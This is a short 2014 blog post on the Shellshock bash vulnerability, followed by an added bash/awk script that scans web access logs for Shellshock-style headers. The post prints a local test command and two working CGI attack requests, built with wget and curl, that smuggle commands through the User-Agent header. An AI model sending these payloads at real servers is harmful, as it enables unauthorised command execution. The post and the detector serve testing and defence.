Thursday, September 25, 2014

with a rusty spoon

well kids. this just sucks donkey balls. get a shell and issue:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
if you see "vulnerable" in the output, you're in for a bad trip.
it gets better. say you have cgi-bin enabled and the script is not running in perl taint mode. run this:
 wget -U "() {test;}; `which touch` /tmp/VULNERABLE" http://server/cgi-bin/valid.cgi

and better.

 curl -A '() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`' http://yourserver/your.cgi

with a rusty spoon.
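
The defender's side of the two requests above, as an added example that is not part of the original post: a bash function that scans combined-format access log lines for a Referer or User-Agent value beginning with "() {". The log lines, addresses and function names are constructed for illustration, and checking Referer as well as User-Agent goes slightly beyond the requests shown.

```shell
#!/usr/bin/env bash
# Added example (not from the original post). Assumes the Apache/nginx
# "combined" log format, where Referer and User-Agent are the 2nd and 3rd
# double-quoted fields on each line.

# Constructed sample log: two benign requests and the two payload shapes
# used in the wget and curl commands above.
sample_log() {
cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.66 - - [25/Sep/2014:10:03:17 +0000] "GET /cgi-bin/valid.cgi HTTP/1.1" 200 0 "-" "() { :;}; /usr/bin/touch /tmp/VULNERABLE"
198.51.100.23 - - [25/Sep/2014:10:04:40 +0000] "GET /your.cgi HTTP/1.1" 200 54 "-" "() { :;}; echo Content-Type: text/html; echo; echo `/usr/bin/id`"
192.0.2.11 - - [25/Sep/2014:10:05:09 +0000] "GET /docs/ HTTP/1.1" 200 1311 "http://example.com/js/init()" "Mozilla/5.0 (compatible)"
EOF
}

# Read log lines on stdin; print "client<TAB>field<TAB>value" for each hit.
scan_shellshock() {
  awk -F'"' '
    # bash treats an environment value as a function definition only when
    # it starts with "() {", so match at the start of the header value
    # (tolerating stray blanks) rather than anywhere on the line.
    function hit(v) { return v ~ /^[ \t]*[(][)][ \t]*[{]/ }
    {
      split($1, pre, " ")            # pre[1] is the client address
      if (hit($4)) print pre[1] "\treferer\t" $4
      if (hit($6)) print pre[1] "\tuser-agent\t" $6
    }'
}

# Stand-alone run over the constructed sample.
sample_log | scan_shellshock
```

In real use, pipe the server's own access log into scan_shellshock; a hit means the request was attempted, not that it succeeded, so follow up with the env test above on that host.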
